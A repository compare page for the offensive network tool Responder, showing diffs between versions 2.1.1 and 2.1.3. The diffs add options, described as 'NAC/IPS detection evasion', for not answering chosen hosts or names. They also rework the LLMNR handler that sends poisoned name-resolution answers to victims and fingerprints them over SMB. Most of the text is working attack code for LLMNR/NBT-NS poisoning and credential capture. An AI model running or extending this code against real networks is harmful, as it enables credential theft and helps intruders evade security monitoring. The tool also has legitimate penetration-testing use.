PenTest/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-12-08 13:41:30 +00:00
Code Issues Projects Releases Wiki Activity

Compare commits

base: PenTest:v2.1.1
Branches Tags
PenTest:master PenTest:revert-216-smbv1ScanWorkAgain
PenTest:v3.1.7.0 PenTest:v3.1.6.0 PenTest:v3.1.5.0 PenTest:v3.1.4.0 PenTest:v3.1.3.0 PenTest:v3.1.2.0 PenTest:v3.1.1.0 PenTest:v3.0.9.0 PenTest:v3.0.8.0 PenTest:v3.0.7.0 PenTest:v3.0.6.0 PenTest:v3.0.5.0 PenTest:v3.0.4.0 PenTest:v3.0.3.0 PenTest:v3.0.2.0 PenTest:v3.0.1.0 PenTest:v3.0.0.0 PenTest:v2.3.4.0 PenTest:v2.3.3.9 PenTest:v2.3.3.8 PenTest:v2.3.3.7 PenTest:v2.3.3.6 PenTest:v2.3.3.5 PenTest:v2.3.3.4 PenTest:v2.3.3.3 PenTest:v2.3.3.2 PenTest:v2.3.3.1 PenTest:v2.3.3.0 PenTest:v2.3.2.8 PenTest:v2.3.2.7 PenTest:v2.3.2.6 PenTest:v2.3.2.5 PenTest:v2.3.2.4 PenTest:v2.3.2.3 PenTest:v2.3.2.2 PenTest:v2.3.2.1 PenTest:v2.3.2 PenTest:v2.3.1 PenTest:v2.3.0 PenTest:v2.1.4 PenTest:v2.1.3 PenTest:v2.1.2 PenTest:v2.1.1 PenTest:v2.1.0 PenTest:v2.0.9 PenTest:v2.0.8 PenTest:v2.0.7 PenTest:v2.0.6 PenTest:v2.0.5 PenTest:v2.0.4 PenTest:v2.0.3 PenTest:v2.0.2 PenTest:v2.0.1
..
compare: PenTest:v2.1.3
Branches Tags
PenTest:master PenTest:revert-216-smbv1ScanWorkAgain
PenTest:v3.1.7.0 PenTest:v3.1.6.0 PenTest:v3.1.5.0 PenTest:v3.1.4.0 PenTest:v3.1.3.0 PenTest:v3.1.2.0 PenTest:v3.1.1.0 PenTest:v3.0.9.0 PenTest:v3.0.8.0 PenTest:v3.0.7.0 PenTest:v3.0.6.0 PenTest:v3.0.5.0 PenTest:v3.0.4.0 PenTest:v3.0.3.0 PenTest:v3.0.2.0 PenTest:v3.0.1.0 PenTest:v3.0.0.0 PenTest:v2.3.4.0 PenTest:v2.3.3.9 PenTest:v2.3.3.8 PenTest:v2.3.3.7 PenTest:v2.3.3.6 PenTest:v2.3.3.5 PenTest:v2.3.3.4 PenTest:v2.3.3.3 PenTest:v2.3.3.2 PenTest:v2.3.3.1 PenTest:v2.3.3.0 PenTest:v2.3.2.8 PenTest:v2.3.2.7 PenTest:v2.3.2.6 PenTest:v2.3.2.5 PenTest:v2.3.2.4 PenTest:v2.3.2.3 PenTest:v2.3.2.2 PenTest:v2.3.2.1 PenTest:v2.3.2 PenTest:v2.3.1 PenTest:v2.3.0 PenTest:v2.1.4 PenTest:v2.1.3 PenTest:v2.1.2 PenTest:v2.1.1 PenTest:v2.1.0 PenTest:v2.0.9 PenTest:v2.0.8 PenTest:v2.0.7 PenTest:v2.0.6 PenTest:v2.0.5 PenTest:v2.0.4 PenTest:v2.0.3 PenTest:v2.0.2 PenTest:v2.0.1

2 Commits
v2.1.1 ... v2.1.3

Author SHA1 Message Date
lgandx
36ef78f85a Added: DontRespondToName and DontRespondTo; NAC/IPS detection evasion 2014-11-27 18:36:33 -05:00
lgandx
c05bdfce17 Added --version and kost's fix for /etc/resolv.conf empty lines parsing. 2014-09-14 14:10:11 -04:00
2 changed files with 110 additions and 72 deletions
Expand all files Collapse all files

7
Responder.conf
View File

@@ -25,7 +25,12 @@ SessionLog = Responder-Session.log
RespondTo = RespondTo =
;Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT ;Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
;RespondTo = WPAD,DEV,PROD,SQLINT ;RespondTo = WPAD,DEV,PROD,SQLINT
RespondToName = RespondToName =
;
;DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
DontRespondTo =
;Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName =
; ;
[HTTP Server] [HTTP Server]
;; ;;

175
Responder.py
View File

@@ -23,7 +23,8 @@ from odict import OrderedDict
from socket import inet_aton from socket import inet_aton
from random import randrange from random import randrange
parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -w -r -f\nor:\npython %prog -i 10.20.30.40 -wrf', VERSION = 'Responder 2.1.2'
parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -w -r -f\nor:\npython %prog -i 10.20.30.40 -wrf', version = VERSION,
prog=sys.argv[0], prog=sys.argv[0],
) )
parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning anything.", dest="Analyse") parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning anything.", dest="Analyse")
@@ -84,6 +85,10 @@ RespondTo = config.get('Responder Core', 'RespondTo').strip()
RespondTo.split(",") RespondTo.split(",")
RespondToName = config.get('Responder Core', 'RespondToName').strip() RespondToName = config.get('Responder Core', 'RespondToName').strip()
RespondToName.split(",") RespondToName.split(",")
DontRespondTo = config.get('Responder Core', 'DontRespondTo').strip()
DontRespondTo.split(",")
DontRespondToName = config.get('Responder Core', 'DontRespondToName').strip()
DontRespondToName.split(",")
#Cli options. #Cli options.
OURIP = options.OURIP OURIP = options.OURIP
LM_On_Off = options.LM_On_Off LM_On_Off = options.LM_On_Off
@@ -260,7 +265,30 @@ def RespondToNameScope(RespondToName, Name):
else: else:
return False return False
##Dont Respond to these hosts/names.
def DontRespondToSpecificHost(DontRespondTo):
if len(DontRespondTo)>=1 and DontRespondTo != ['']:
return True
else:
return False
def DontRespondToSpecificName(DontRespondToName):
if len(DontRespondToName)>=1 and DontRespondToName != ['']:
return True
else:
return False
def DontRespondToIPScope(DontRespondTo, ClientIp):
if ClientIp in DontRespondTo:
return True
else:
return False
def DontRespondToNameScope(DontRespondToName, Name):
if Name in DontRespondToName:
return True
else:
return False
################################################################################## ##################################################################################
#NBT NS Stuff #NBT NS Stuff
################################################################################## ##################################################################################
@@ -343,6 +371,13 @@ class NB(BaseRequestHandler):
data, socket = self.request data, socket = self.request
Name = Decode_Name(data[13:45]) Name = Decode_Name(data[13:45])
if DontRespondToSpecificHost(DontRespondTo):
if RespondToIPScope(DontRespondTo, self.client_address[0]):
return None
if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()):
return None
if Analyze(AnalyzeMode): if Analyze(AnalyzeMode):
if data[2:4] == "\x01\x10": if data[2:4] == "\x01\x10":
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
@@ -646,7 +681,6 @@ def Is_Anonymous(data):
if SecBlobLen > 260: if SecBlobLen > 260:
SSPIStart = data[79:] SSPIStart = data[79:]
LMhashLen = struct.unpack('<H',data[93:95])[0] LMhashLen = struct.unpack('<H',data[93:95])[0]
print 'LMHASHLEN:',struct.unpack('<H',data[89:91])[0]
if LMhashLen == 0 or LMhashLen == 1: if LMhashLen == 0 or LMhashLen == 1:
return True return True
else: else:
@@ -1238,6 +1272,8 @@ def IsICMPRedirectPlausible(IP):
dnsip = [] dnsip = []
for line in file('/etc/resolv.conf', 'r'): for line in file('/etc/resolv.conf', 'r'):
ip = line.split() ip = line.split()
if len(ip) < 2:
continue
if ip[0] == 'nameserver': if ip[0] == 'nameserver':
dnsip.extend(ip[1:]) dnsip.extend(ip[1:])
for x in dnsip: for x in dnsip:
@@ -1266,10 +1302,10 @@ class LLMNR(BaseRequestHandler):
def handle(self): def handle(self):
data, soc = self.request data, soc = self.request
try: try:
if Analyze(AnalyzeMode): if data[2:4] == "\x00\x00":
if data[2:4] == "\x00\x00": if Parse_IPV6_Addr(data):
if Parse_IPV6_Addr(data): Name = Parse_LLMNR_Name(data)
Name = Parse_LLMNR_Name(data) if Analyze(AnalyzeMode):
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
@@ -1278,68 +1314,67 @@ class LLMNR(BaseRequestHandler):
except Exception: except Exception:
Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name) Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name)
logger3.warning(Message) logger3.warning(Message)
if PrintLLMNRNBTNS(AnalyzeFilename,Message): if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message print Message
else: else:
Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name) Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name)
if PrintLLMNRNBTNS(AnalyzeFilename,Message): if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message print Message
logger3.warning(Message) logger3.warning(Message)
if RespondToSpecificHost(RespondTo): if DontRespondToSpecificHost(DontRespondTo):
if Analyze(AnalyzeMode) == False: if RespondToIPScope(DontRespondTo, self.client_address[0]):
if RespondToIPScope(RespondTo, self.client_address[0]): return None
if data[2:4] == "\x00\x00":
if Parse_IPV6_Addr(data): if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()):
Name = Parse_LLMNR_Name(data) return None
if RespondToSpecificHost(RespondTo):
if Analyze(AnalyzeMode) == False:
if RespondToIPScope(RespondTo, self.client_address[0]):
if RespondToSpecificName(RespondToName) == False: if RespondToSpecificName(RespondToName) == False:
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate() buff.calculate()
for x in range(1): for x in range(1):
soc.sendto(str(buff), self.client_address) soc.sendto(str(buff), self.client_address)
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name) Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('[+] OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate() buff.calculate()
for x in range(1): for x in range(1):
soc.sendto(str(buff), self.client_address) soc.sendto(str(buff), self.client_address)
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name) Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('[+] OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
else:
pass
if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False: if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False:
if data[2:4] == "\x00\x00":
if Parse_IPV6_Addr(data):
Name = Parse_LLMNR_Name(data)
if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate() buff.calculate()
@@ -1360,24 +1395,24 @@ class LLMNR(BaseRequestHandler):
logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
if RespondToSpecificName(RespondToName) == False: if RespondToSpecificName(RespondToName) == False:
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate() buff.calculate()
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name) Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name)
for x in range(1): for x in range(1):
soc.sendto(str(buff), self.client_address) soc.sendto(str(buff), self.client_address)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('[+] OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
else: else:
pass pass
else: else:
@@ -2540,5 +2575,3 @@ if __name__ == '__main__':
main() main()
except: except:
raise raise